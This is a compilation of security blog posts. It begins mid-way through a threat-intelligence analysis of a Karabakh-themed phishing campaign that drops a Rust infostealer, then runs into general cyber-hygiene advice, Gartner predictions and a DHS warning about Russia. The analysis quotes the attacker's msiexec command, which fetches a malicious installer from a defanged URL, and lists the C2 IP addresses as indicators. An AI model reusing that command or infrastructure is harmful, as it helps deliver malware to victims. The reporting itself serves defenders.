<p>..\..\Windows\System32\msiexec.exe /i "https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi? rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0"</p>
<p>This command downloads an .MSI (Microsoft Installer) file. Figure 3 shows this MS installer file performing two actions when clicked. The first action is to display an image with the same filename as the phony image shortcut (shown in the zip archive in Figure 4):</p>
<p><em><a href="{{#staticFileLink}}12239426271,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239426271,RESIZE_584x{{/staticFileLink}}" width="578" alt="12239426271?profile=RESIZE_584x" /></a>Figure 5. The phony image is shown when the .LNK shortcut is executed</em></p>
<p>This technique may fool some users into thinking the shortcut was simply an image file. But this is misdirection. Instead, the installer simultaneously loads hidden malware into the targeted computer.</p>
<p>Malware - The malicious installer creates a new folder in the user’s %APPDATA% folder called “Windows Defender Health Check.” It also installs malware with the same name:</p>
<p>C:\Users\[username]\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe</p>
<p>Uncommon Traits - This malware is programmed in RUST, which is not the programming language of choice for most malware authors. This makes using standard analysis tools and methods somewhat less useful. The fact that RUST is used already makes this threat actor different. However, this is not the only trait that makes this malware distinct.</p>
<p>For persistence, a temporary file is created called “24rp.xml.” This file is used to create a scheduled task.</p>
<p><em><a href="{{#staticFileLink}}12239426860,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239426860,RESIZE_710x{{/staticFileLink}}" width="624" alt="12239426860?profile=RESIZE_710x" /></a>Figure 6. Scheduled task - Once the scheduled task is created, the .XML file is deleted.</em> </p>
<p>This technique assumes that the intended targets leave their computers on overnight so the malware can execute outside regular office hours when it is less likely to be noticed. Moreover, for even greater stealth, the malware can sleep for random amounts of time when performing its tasks.</p>
<p><em><a href="{{#staticFileLink}}12239427856,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239427856,RESIZE_710x{{/staticFileLink}}" width="621" alt="12239427856?profile=RESIZE_710x" /></a>Figure 7. Sleep between 10 and 20 minutes</em></p>
<p>Next, we will refer back to Figure 2 for another indication of how this malware attempts to stay hidden. Notice the memo is dated August 8<sup>th</sup>. We found that this malware was created the previous day by examining its compile timestamp.</p>
<p><em><a href="{{#staticFileLink}}12239428695,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12239428695,RESIZE_710x{{/staticFileLink}}" width="623" alt="12239428695?profile=RESIZE_710x" /></a>Figure 8. Creation time of the malware</em></p>
<p>This short timeframe makes it virtually impossible to release the malware before the attack starts accidentally.</p>
<p>Stealing Information - Ultimately, the malware acts like an infostealer, gathering basic computer information and sending it to a C2 server. The following commands are executed:</p>
<p><em><a href="{{#staticFileLink}}12239428071,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239428071,RESIZE_710x{{/staticFileLink}}" width="621" alt="12239428071?profile=RESIZE_710x" /></a><a href="{{#staticFileLink}}12239429656,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239429656,RESIZE_710x{{/staticFileLink}}" width="632" alt="12239429656?profile=RESIZE_710x" /></a>Figure 9. Commands executed by the malware</em></p>
<p>These commands suggest that the threat actor is still in the early stages of fully attempting to compromise its targets. The information being gathered from these commands could be used to tailor specific attacks for each infected target.</p>
<p>This infostealer is unique because it also collects a list of environment variables and takes an extra step to check for any proxy servers in use.</p>
<p><em><a href="{{#staticFileLink}}12239429473,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239429473,RESIZE_710x{{/staticFileLink}}" width="621" alt="12239429473?profile=RESIZE_710x" /></a>Figure 10. Checking for proxy</em></p>
<p>If a proxy server is set, the malware understands how to route its traffic. The malware issues a POST request to send the encrypted information it stole to a C2 server owned by the threat actor, 78[.]135.73.140, through port 35667.</p>
<p>Tracking a Possible Threat Actor - Our telemetry found nothing too interesting with the C2 server itself. However, digging into the server uncovered additional information. Using data from PDNS and other records, the C2 server 78[.]135.73.140 does not seem to be a shared server. This suggests the threat actor has total control and setup of the server. With this assumption, we searched to discover more of the threat actor’s network infrastructure. Inside the /24 subnet alone, four additional servers were revealed:<br /> <a href="{{#staticFileLink}}12239429893,RESIZE_400x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239429893,RESIZE_400x{{/staticFileLink}}" width="252" alt="12239429893?profile=RESIZE_400x" /></a><em>Figure 11. Partial network infrastructure</em></p>
<p>Using the August 8<sup>th</sup> date on the memo as a starting point, we searched traffic going to these servers in the month prior. While we did not find significant amounts of traffic, we identified one IP address in Colombia that connected to the server 78[.]135.73.188 in July on a port commonly used for VPN for a substantial amount of time. If the threat actor wanted to hide their activity, using a VPN server under their control would accomplish the job. The Colombia IP address belongs to a cellular company, which suggests the user may have been using a mobile hotspot. If so, this may be the location of the attacker.</p>
<p>Conclusion - The threat actor in this campaign uses a few advanced techniques, including RUST and after-hours execution, to help it stay under the radar and make analysis more difficult. The size of the network infrastructure also suggests this threat actor is not a run-of-the-mill malware developer but someone with access to resources. </p>
<p>Using a geopolitical rule indicates that this threat actor is plugged in and knows how to target specific users.</p>
<p> </p>
<p>File <strong>IOCs</strong></p>
<table>
<tbody>
<tr>
<td width="306">
<p><sub>2A71BA3FEF819AB9FF3347CF71EEA37766B1E80FDBC1B53C83DD3B19CE71EBFD</sub></p>
</td>
<td width="174">
<p><sub>ARMENIAN_ACT_OF_AGGRESSION.pdf.html</sub></p>
</td>
</tr>
<tr>
<td width="306">
<p><sub>17B3ACB560E979556207B8E7E41A086F6F147381E2FFD1CE672D663A526B1FB5</sub></p>
</td>
<td width="174">
<p><sub>Armenian Aggression.zip</sub></p>
</td>
</tr>
<tr>
<td width="306">
<p><sub>04725FB5A9E878D68E03176364F3B1057A5C54CCA06EC988013A508D6BB29B42</sub></p>
</td>
<td width="174">
<p><sub>1.KARABAKH.jpg.lnk</sub></p>
</td>
</tr>
<tr>
<td width="306">
<p><sub>35F2F7CD7945F43D9692B6EA39D82C4FC9B86709B18164AD295CE66AC20FD8E5</sub></p>
</td>
<td width="174">
<p><sub>karabakh.jpg.msi</sub></p>
</td>
</tr>
<tr>
<td width="306">
<p><sub>5327308FEE51FC6BB95996C4185C4CFCBAC580B747D79363C7CF66505F3FF6DB</sub></p>
</td>
<td width="174">
<p><sub>WindowsDefenderHealthcheck.exe</sub></p>
</td>
</tr>
</tbody>
</table>
<p><strong> </strong></p>
<p>Network <strong>IOCs</strong></p>
<table>
<tbody>
<tr>
<td width="563">
<p>https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0</p>
</td>
</tr>
<tr>
<td width="563">
<p>78[.]135.73.140</p>
</td>
</tr>
<tr>
<td width="563">
<p>78[.]135.73.147</p>
</td>
</tr>
<tr>
<td width="563">
<p>78[.]135.73.162</p>
</td>
</tr>
<tr>
<td width="563">
<p>78[.]135.73.183</p>
</td>
</tr>
<tr>
<td width="563">
<p>78[.]135.73.188</p>
</td>
</tr>
</tbody>
</table>
<p> </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization and has reported extensively on AI technology. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941%C2%A0">https://www.linkedin.com/company/64265941 </a></li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia?lctg=141970831">https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia?lctg=141970831</a></p></div>Don’t be the Loser at Cyber Securityhttps://redskyalliance.org/xindustry/don-t-be-the-loser-at-cyber-security2022-12-27T18:25:28.000Z2022-12-27T18:25:28.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}10920542099,RESIZE_192X{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10920542099,RESIZE_192X{{/staticFileLink}}" alt="10920542099?profile=RESIZE_192X" width="186" /></a>I should not be writing this article in 2022, but sometimes the apparent need to be restated. Reality has a way of asserting itself, irrespective of any personal or commercial choices we make, good or bad. For example, recently, the city services of Antwerp in Belgium were the victim of a highly disruptive cyberattack. See: <a href="https://www.bleepingcomputer.com/news/security/play-ransomware-claims-attack-on-belgium-city-of-antwerp/">https://www.bleepingcomputer.com/news/security/play-ransomware-claims-attack-on-belgium-city-of-antwerp/</a></p>
<p>As usual, all parties cried "foul play" and suggested that proper cybersecurity measures should have been in place. As usual, it all happens a bit too late. There was nothing special or unique about the attack, and it was not the last of its kind either. Has your INFOSEC team reviewed/updated your cyber incident disaster recovery plan? Are all the documented security measures in place and tested?</p>
<p>Start with the basics: Perform proper user training that includes all the usual: password hygiene, restrictions on account sharing, and clear instructions not to open untrusted emails or access unscrupulous websites. It is inconvenient that human actions continue to be the weakest link in cyber defense, but it's a fact. Have new employees been trained?</p>
<p>Regarding the infrastructure, consider proper asset auditing because you cannot protect what you do not know exists. Next, implement network segmentation to separate all traffic into possible minor divisions. If a server does not need to see or talk to another server, then that server should not be connected to the same VLAN, with no exceptions. Remote access should move from traditional VPN access to zero-trust networking alternatives. Do all employees need access to all services and servers? Consider setting access levels for all employees.<a href="#_ftn1">[1]</a></p>
<p>Consider what needs to be encrypted for transmission and at rest, even if communication is internal only. You never know what has already been breached, so someone can eavesdrop where you least expect it.</p>
<p>Do not allow users “randomly” plug devices into your network. Lock ports and restrict Wi-Fi access to known devices. Users will complain, but that is just part of the tradeoff. Either way, exceptions should be kept to a minimum. The IT department should be in charge of this with support from senior management.</p>
<p>Servers: Keep everything updated via patching and document it. This is true for exposed, public-facing servers, such as web servers, but it is equally essential for all servers and devices on the network. Another step is investigating older/unused/forgotten equipment from networks. If a server has no reason to exist, decommission it or destroy the instance. It would be best if you acted ASAP, whether it is a container, VM, instance, or node. And properly erase, clear, disable or destroy old equipment before disposal.</p>
<p> An unpatched server is a vulnerable server; it only takes one vulnerable server to bring down the best cyber security program. If patching is too disruptive to do daily, look to alternative methods such as live patching and use it everywhere you can.</p>
<p>Hackers are experienced criminals, and you do not need your team to make it easier for them so identify and close any/all vulnerabilities as quickly as possible. Due to the features of live patching, your team does not have to worry about prioritizing vulnerabilities to patch because they can patch them all.</p>
<p>Your cyber threat team should maintain a proactive approach. Keep up with the latest threats and security news. While some vulnerabilities have a disproportionate share of attention due to being "named" vulnerabilities, sometimes it is one of the countless "regular" vulnerabilities that hits the hardest. You can use a vulnerability management tool to help with this.</p>
<p>Remember your disaster recovery plan? Start from the simple premise of "what if we woke up tomorrow and none of our IT worked?" Answer these questions: How quickly can I get bare-bone services up and running? How long does it take to restore the entire data backup? Are we testing the backups regularly? Is the service deployment process adequately documented, even if it is a hard copy of scripts? What are the legal implications of losing your systems, data, or infrastructure for several weeks?</p>
<p>As an organization, you want to avoid getting into a position where your systems are down, your customers are going to your competitor's website, and your senior management is demanding answers and results. All the questions that have been posed above can be answered. Plenty of resources on the web are available to help you and your team members from suffering a breach.</p>
<p>It is up to all organizations to take steps and adopt procedures to protect themselves from cyber-attacks. </p>
<p>The following is what Red Sky Alliance recommends:</p>
<ul>
<li>All data in transmission and at rest should be encrypted.</li>
<li>Proper data backup and off-site storage policies should be adopted and followed.</li>
<li>Implement a 2-Factor authentication-company wide.</li>
<li>For USA readers, join and become active in your local Infragard chapter; there is no charge for membership. infragard.org</li>
<li>Update disaster recovery plans and emergency procedures with cyber threat recovery procedures. And test them.</li>
<li>Institute cyber threat and phishing training for all employees, with testing and updating.</li>
<li>Recommend/require cyber security software, services, and devices to be used by all at-home working employees and consultants.</li>
<li>Review and update your cyber threat and information security policies and procedures. Make them a part of all emergency planning and training.</li>
<li>Ensure that all software updates and patches are installed immediately.</li>
<li>Enroll your company/organization in RedXray for daily cyber threat notifications directed at your domains. RedXray service is $500 a month and provides threat intelligence on ten (10) cyber threat categories, including Keyloggers, with having to connect to your network.</li>
<li>Purchase annual cyber insurance coverage from Red Sky Alliance provided by Cysurance.</li>
</ul>
<p> </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/ </li>
<li>Website: https://www. wapacklabs. com/ </li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a> </p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2022/12/cyber-security-is-not-losing-game-if.html">https://thehackernews.com/2022/12/cyber-security-is-not-losing-game-if.html</a></p></div>Gartner’s Top Cyber Security Predictionshttps://redskyalliance.org/xindustry/gartner-s-top-cyber-security-predictions2022-07-11T15:31:37.000Z2022-07-11T15:31:37.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}10638461098,RESIZE_180x180{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10638461098,RESIZE_180x180{{/staticFileLink}}" width="118" alt="10638461098?profile=RESIZE_180x180" /></a>Gartner’s top eight cybersecurity predictions warn organizations that they need to employ greater resilience to reduce the impact of more severe cyberattacks. Reducing the blast radius of larger, more potentially devastating attacks is key. Implied in the predictions is advice to focus not just on ransomware or any other currently trending type of cyberattack, but to prioritize cybersecurity investments as core to managing risks and see them as investments in the business. By 2025, 60% of organizations will use cybersecurity risk as a primary determinant in conducting third-party transactions and business engagements, according to Gartner‘s predictions.</p>
<p>Doubling down with greater resilience across every threat surface is key. For example, while Gartner mentions zero-trust network access (ZTNA) in just one of the eight predictions, the core concepts of ZTNA and its benefits are reflected in most of the predictions. The predictions also note that investing in preventative controls is not enough and that there needs to be a much higher priority placed on resilience. This is because threat surfaces grow faster than many organizations can gain visibility to and protect.<a href="#_ftn1">[1]</a></p>
<p>By 2025, it is expected that 80% of enterprises will adopt a strategy to unify web, cloud services, and private application access from a single vendor’s secured service edge (SSE) platform. ZTNA is one of the core technologies enabling SSE platforms.</p>
<p>The following are Gartner’s top eight cybersecurity predictions for 2022-2023:</p>
<ol>
<li>Through 2023, government regulations requiring organizations to provide consumer privacy rights will cover 5 billion citizens and more than 70% of global GDP. As of last year, nearly 3 billion individuals were covered under consumer privacy rights across 50 countries, and there’s progress on expanding privacy regulations globally. Gartner suggests organizations track subject rights request metrics, including cost per request and time to fulfill, to identify inefficiencies and justify accelerated automation.</li>
<li>By 2025, 80% of enterprises will adopt a strategy to unify web, cloud services and private application access from a single vendor’s SSE platform. There’s a groundswell of activity happening already around the unification of web, cloud services, private applications and more. Stand-alone ZTNA providers are looking to integrate into SSE and SASE platforms, with merger and acquisition activity continuing to increase. Palo Alto Networks acquiring CloudGenix, Fortinet acquiring OPAQ, Ivanti acquiring MobileIron and PulseSecure, Check Point Software Technologies acquiring Odo Security, ZScaler acquiring Edgewise Networks, Cisco acquiring Portshift and Absolute Software acquiring NetMotion are examples of this trend. “One of the key trends emerging from the pandemic has been the broad rethinking of how to provide network and security services to distributed workforces,” said Garrett Bekker, senior research analyst, security, at 451 Research, in his research report.</li>
<li>60% of organizations will embrace zero trust as a starting point for security by 2025. More than half will fail to realize the benefits. Gartner’s pessimism reflects how challenging it is becoming for organizations to secure the exponentially growing number of machine identities they’re generating, combined with identity access management (IAM) and privileged access management (PAM) failures in organizations today. Attempting to protect hybrid cloud configurations with ZTNA while adhering to the shared responsibility models of public cloud providers, including Amazon, has also proven difficult for many organizations. Getting hybrid cloud security right is hard, making any organization’s attempts to pursue a ZTNA framework challenges.</li>
<li>By 2025, 60% of organizations will use cybersecurity risk as a primary determinant in conducting third-party transactions and business engagements. This prediction implies that cybersecurity must be prioritized as a business investment, focusing on reducing operating risk. However, with Gartner observing that cyberattacks aimed at third parties are increasing, only 23% of security and risk leaders monitoring the third-party threat shows how broad of an attack surface this leaves open. A sure sign cybersecurity will be integral to business operations is when risk assessments will need to be completed before contracts with third-party companies, a prediction Gartner sees happening within three years.</li>
<li>Through 2025, 30% of nation-states will pass legislation that regulates ransomware payments, fines, and negotiations, up from less than 1% in 2021. Today, French cybersecurity insurance firms refuse to pay a ransom if one of their clients is hit with a ransomware attack. Gartner predicts nation-states will follow the French cyber insurer’s lead and regulate ransomware payments. This prediction also shows how much of a business decision risk management, deterrence, and resilience is becoming.</li>
<li>By 2025, threat actors will have weaponized operational technology environments successfully to cause human casualties. Unfortunately, air gaps aren’t enough to protect energy, oil, gas, and processing refineries and manufacturing centers that run on industrial control systems (ICS) not designed to protect against cyberattacks. So, it’s not surprising that 46% of known operational technology (OT) cyber threats are poorly detected or not detected. In addition, Honeywell finds that 11% are never detected and most detection engines and techniques catch just 35% of all attempted breaches.</li>
<li>By 2025, 70% of CEOs will mandate a culture of organizational resilience to survive coinciding threats from cybercrime, severe weather events, civil unrest, and political instabilities. Another prediction shows how CEOs are looking more at cybersecurity as a risk management issue, not purely an IT one. Gartner’s inquiry calls must be heavily slanted to fighting the most popular cyberattack strategies for a given month or period when what’s needed is a rethinking of the cybersecurity tech stack for more severe threats and risk. Gartner’s prioritizing of resilience shows that their clients want stop-gap help with current cybersecurity weaknesses when a more complete cybersecurity tech stack overhaul is needed.</li>
<li>By 2026, 50% of C-level executives will have performance requirements related to risk built into their employment contracts. Forward-thinking boards of directors started holding CEOs accountable for their environmental, social, and governance (ESG) initiatives more than three years ago. CIOs have had their pay indexed to how much their departments help reduce roadblocks to more revenue and, most importantly, how well they serve sales to help them drive more revenue. Risk management is a core skill a CIO and CISO need for excelling in their work, much the same way a CEO needs to know how to excel at ESG initiatives. The background support for this prediction has been steadily growing for years.</li>
</ol>
<p> </p>
<p>The eight cybersecurity predictions are useful for CIOs, CISOs and their teams to start thinking about how they’re doing to become more resilient and redefine their tech stacks to handle entirely new types of attacks. Cybersecurity becomes a business decision when CISOs have their pay indexed to risk management. That is a step in the right direction of seeing resilience as a core business strength to be improved.</p>
<p>It is up to all organizations to take steps and adopt procedures to protect themselves from cyberattacks. Predictions are informative, but all managers need to take steps to protect their organizations from cyberattacks and ransomware demands today.</p>
<p>The following is what Red Sky Alliance recommends:</p>
<ul>
<li>All data in transmission and at rest should be encrypted.</li>
<li>Proper data backup and off-site storage policies should be adopted and followed.</li>
<li>Implement 2-Factor authentication-company-wide.</li>
<li>For USA readers, join and become active in your local Infragard chapter, there is no charge for membership. infragard.org</li>
<li>Update disaster recovery plans and emergency procedures with cyber threat recovery procedures. And test them.</li>
<li>Institute cyber threat and phishing training for all employees, with testing and updating.</li>
<li>Recommend/require cyber security software, services, and devices to be used by all at-home working employees and consultants.</li>
<li>Review and update your cyber threat and information security policies and procedures. Make them a part of all emergency planning and training.</li>
<li>Ensure that all software updates and patches are installed immediately.</li>
<li>Enroll your company/organization in RedXray for daily cyber threat notifications directed at your domains. RedXray service is $500 a month and provides threat intelligence on ten (10) cyber threat categories including Keyloggers, without having to connect to your network.</li>
<li>Purchase annual cyber insurance coverage from Red Sky Alliance provided by Cysurance.</li>
</ul>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs. com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www. redskyalliance. org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www. wapacklabs. com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www. linkedin. com/company/64265941</a> </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a>[1] <a href="https://venturebeat.com/2022/06/22/what-gartners-top-cybersecurity-predictions-for-2022-23-reveal/">https://venturebeat.com/2022/06/22/what-gartners-top-cybersecurity-predictions-for-2022-23-reveal/</a></p></div>DHS Warns of Russian Cyber Attackhttps://redskyalliance.org/xindustry/dhs-warns-of-russian-cyber-attack2022-01-27T17:08:46.000Z2022-01-27T17:08:46.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}10051028253,RESIZE_930x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10051028253,RESIZE_400x{{/staticFileLink}}" width="250" alt="10051028253?profile=RESIZE_400x" /></a>The U.S. Department of Homeland Security is reportedly warning that the U.S. could witness a retaliatory cyberattack at the hands of Russia if it decides to respond to the latter's potential invasion of Ukraine, where 100,000 or more troops have been amassed for weeks. According to a DHS Intelligence and Analysis bulletin dated 23 January 2022 and sent to law enforcement agencies around the country, officials believe that if the U.S. responds to rising tensions at Ukraine's eastern border, the Russian government or its state-sponsored actors could initiate a cyberattack.</p>
<p>The document reportedly reads: "We assess that Russia would consider initiating a cyberattack against the Homeland if it perceived a U.S. or NATO response to a possible Russian invasion of Ukraine threatened its long-term national security." DHS warns that Russia can employ a "range of offensive cyber tools" against U.S. networks, including "a low-level denial of service attack" or a "destructive" attack on critical infrastructure.</p>
<p>DHS officials maintain that Russia's "threshold for conducting disruptive or destructive cyberattacks … remains very high." These are attacks, the agency says, Moscow has not directly employed against U.S. infrastructure in the past although it has engaged cyberespionage campaigns such as <a href="https://www.bankinfosecurity.com/7-takeaways-supply-chain-attack-hits-solarwinds-customers-a-15585">SolarWinds</a>. The latter, distributed via a corrupt update on SolarWinds' software, later affected 100 organizations globally, with follow-on attacks at nine U.S. federal agencies, including DHS and the Department of Commerce. Experts have attributed the campaign to <a href="https://attack.mitre.org/groups/G0016/">APT29</a>, aka Nobelium, which is linked to Russia's Foreign Intelligence Service, or SVR.</p>
<p>The 23 January 2022 bulletin also highlights Russia-linked attacks targeting Ukraine's electric grid, which struck in 2015 and 2016. "This is not at all unanticipated and is right in line with the joint alert from the FBI and CISA about 10 days ago," says Mike Hamilton, former vice chair for the DHS State, Local, Tribal, and Territorial Government Coordinating Council. "Geopolitical tensions are at a high … [and] the U.S. should not feel as though this activity is confined to NATO-curious countries. It's been well-reported … that Russian fingerprints have been found inside our own critical infrastructure networks. It is unlikely that all the access gained has been taken back."</p>
<p>Hamilton, former CISO for the city of Seattle and currently the CISO for the firm Critical Insight, adds, "Given all this information and these trends, it is likely that any military action taken by the U.S. in Ukraine will be met by actions designed to give the U.S. other things to worry about."</p>
<p>The latest warning follows a rapid surge in crypto-locking attacks eyeing U.S. targets in 2021. These include Russia-backed ransomware hits on <a href="https://www.govinfosecurity.com/fbi-darkside-ransomware-used-in-colonial-pipeline-attack-a-16555">Colonial Pipeline</a>, which caused fuel shortages along the U.S. East Coast; also, the world's largest meat supplier, <a href="https://www.govinfosecurity.com/blogs/ransomware-to-riches-story-jbs-pays-criminals-11-million-p-3055">JBS</a>, went dark after Russian hackers crypto-locked its systems.</p>
<p>Earlier this month, multiple Ukrainian websites were defaced with warnings to "be afraid and expect the worst," which came as troops continued to amass at the country's eastern border. Several government websites affected by the breach were taken offline to be restored. Defaced websites included messages written in Ukrainian, Russian and Polish. The incident occurred after a week of diplomatic discussions between NATO and Russia.</p>
<p>Ukraine-Russia relations have continued to sour in recent months, after Russian President Vladimir Putin criticized Ukraine's plans to join NATO. The White House subsequently warned that Moscow was running disinformation campaigns targeting Ukraine President Volodymyr Zelensky's administration. Putin threatened to further invade Ukraine if the country is allowed to join NATO. But the U.S. and its NATO allies said Ukraine's decision is not open to negotiation and have called on Moscow to de-escalate and pursue diplomacy, threatening that there will be reprisals for any further military activity.</p>
<p>Despite warnings from U.S. President Joe Biden to the Kremlin, Putin has remained steadfast on preventing Ukraine's NATO entry and he has sought a NATO troop removal from Eastern Europe. Foreign policy experts contend that Russia views Ukraine a former Soviet state as part of its sphere of influence. Russia annexed the Crimean Peninsula in southern Ukraine in 2014.</p>
<p>While other security experts say the alert is not terribly surprising, it is certainly worth closely monitoring. "DHS often releases alerts around potential upticks in activity," says Ross Rustici, a former technical lead for the U.S. Department of Defense and currently the managing director of the advisory firm StoneTurn. "Ultimately, these pronouncements do little to shift the needle on public opinion or corporate behavior. There is a significant record of Russian intrusions into CI/KR [critical infrastructure and key resources] that is sustained and ongoing. We would be best served by concentrating our efforts on continued security around those systems."</p>
<p>"We've yet to see cyberattacks used in concert with a full-fledged military campaign. DHS' warning sets that expectation that something has changed in the threat profile," says Tim Erlin, vice president of the firm Tripwire. "Organizations should be prepared for a change in the types of attacks they see."</p>
<p>"To see this warning coming out of the DHS at a point when tensions are so high is not necessarily surprising," says Lisa Plaggemier, interim executive director of the National Cybersecurity Alliance. "Nonetheless, [it] once again serves to underline how important it is that individuals and businesses prioritize cybersecurity. Fortunately, there has been a dedicated effort within the government to bolster its own cybersecurity capabilities and to promote cybersecurity awareness among the private sector and general public."</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at <a>1-844-492-7225</a>, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p><br /> </p>
<p><strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p><br /> Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a><br />Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a><br />LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><br /> <strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p><br /> REDSHORTS - Weekly Cyber Intelligence Briefings<br /> <a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p>
<p> </p>
<p>Article <a href="{{#staticFileLink}}10051028892,original{{/staticFileLink}}">TR-22-027-001.pdf</a></p></div>